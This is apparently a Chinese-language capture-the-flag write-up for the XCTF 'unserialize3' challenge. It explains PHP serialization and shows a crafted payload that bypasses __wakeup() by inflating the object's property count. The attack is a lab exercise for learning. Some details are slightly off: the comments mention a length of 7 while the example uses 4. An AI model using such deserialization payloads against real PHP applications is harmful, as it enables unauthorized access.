攻防世界unserialize3学习

【考察点】
①绕过_wakeup()过滤机制
②序列化与反序列化的原理与格式
③利用类代码序列化的方法
④两个函数

serialize()     //将一个对象转换成一个字符串
unserialize()   //将字符串还原成一个对象

【知识点】
①序列化后格式为
public属性序列化后格式为：数据类型:属性名长度:“属性名”;数据类型:属性值长度:“属性值”
②反序列化与_wakeup函数的关系
执行unserialize()时，先会调用__wakeup()
且当序列化字符串中属性值个数大于属性个数，就会导致反序列化异常，从而跳过__wakeup()
如

如正常O:4:"xctf":1:{s:4:"flag";s:3:"111";}#（即只有一个1这个属性值）
异常O:4:"xctf":2:{s:4:"flag";s:3:"111";}#即可绕过_wakeup的代码
#知识点
#O呢就是object对象的意思
#数字7代表着对象的函数名有7个占位
#然后就是对象名了
#这个数字1表示对象里有一个变量
#大括号里的s代表的是string类型还有一个i是int型

题目分析
进入后发觉是

即定义了flag=‘111’;
且涉及到_wakeup(),即思考与序列化和反序列化相关的题目
因为要绕过_wakeup()
因此需要将其序列化后,改类型值，从而实现绕过_wakeup()的目的
因此补全代码

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}}
$x=new xctf();
echo serialize($x);
?>

然后得到
O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;}
然后更改类型值为2
O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}
构造payload
/?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}
成功绕过